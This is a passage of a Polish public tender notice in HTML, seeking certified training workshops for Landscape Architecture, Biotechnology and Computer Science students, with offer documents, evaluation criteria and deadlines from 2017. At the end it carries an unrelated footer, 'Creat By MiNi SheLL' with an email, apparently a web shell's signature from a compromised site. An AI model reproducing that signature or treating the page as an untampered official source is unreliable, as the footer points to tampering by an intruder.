                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia okoliczności, o których mowa w art. 25. ust. 1. pkt 2) ustawy, tj.: spełnianie przez oferowane usługi wymagań określonych przez Zamawiającego w pkt. 3.10. SIWZ, 
Zamawiający żąda by Wykonawca w Wykazie osób (odpowiednio do części) wypełnił wiersz o treści: Rodzaj zatrudnienia lub umowy o pracę w trakcie realizacji przedmiotowego zamówienia oraz wiersz o treści: Zakres wykonywanych czynności, bezpośrednio związanych z realizacją przedmiotu zamówienia przez cały okres jego trwania tego wykazu.
W przypadku wystąpienia zdarzeń, tj.:  śmierć lub choroba pracownika lub rozwiązanie umowy 
o pracę lub zmiana charakteru zatrudnienia pracownika (wymienionego w Wykazie osób  załącznik nr 5A-5C do SIWZ  odpowiednio do części) na podstawę inną niż umowa o pracę Wykonawca zobowiązany jest przedstawić Zamawiającemu dane pracownika (wraz z zakresem wykonywanych czynności, bezpośrednio związanych z realizacją przedmiotu zamówienia przez cały okres jego trwania) zatrudnionego na warunkach określonych w pkt. 3.10. SIWZ. 
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zawartość oferty: 
Formularz ofertowy  zgodnie z załącznikiem nr 1 do SIWZ.
Oświadczenie, o którym mowa w pkt. 5.2. SIWZ  zgodnie z załącznikiem nr 2 do SIWZ.
Pełnomocnictwo*  podmiotów występujących wspólnie (jeżeli dotyczy).
Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z dokumentów załączonych do oferty). 
Dokumenty**  (określone odpowiednio w pkt. 19.4. SIWZ) poświadczające kryteria oceny ofert. 
*Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii.
**Dokumenty należy złożyć w formie kopii (potwierdzonej za zgodność z oryginałem przez Wykonawcę).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60.00</td></tr><tr><td>Doświadczenie (minimum osiemdziesięcio [ 80 ] godzinne) osób wyznaczonych do realizacji zamówienia w zakresie prowadzenia szkoleń (dla grupy minimum piętnastu [ 15 ] osób)</td><td>40.00</td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W Projekcie umowy, stanowiącym załącznik nr 4 do SIWZ, wskazano, że:
W przypadku zmniejszenia liczby godzin przedmiotu umowy Zamawiający zastrzega sobie prawo do zmniejszenia wynagrodzenia określonego w § 2. ust. 1. umowy. Wynagrodzenie ulegnie proporcjonalnemu zmniejszeniu o wartość wynikającą z iloczynu liczby godzin szkolenia (o które zmniejszy się zakres przedmiotu umowy) i wartości jednej [ 1 ] godziny, to jest: _____ 00/100 [ ____,__ ] złotych brutto (określonej przez Wykonawcę).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Architektura Krajobrazu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Architektura Krajobrazu. Opis przedmiotu zamówienia został określony w załączniku nr 1A do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Biotechnologia.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Biotechnologia. Opis przedmiotu zamówienia został określony w załączniku nr 1A do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Informatyka.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Informatyka. Opis przedmiotu zamówienia został określony w załączniku nr 1A do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com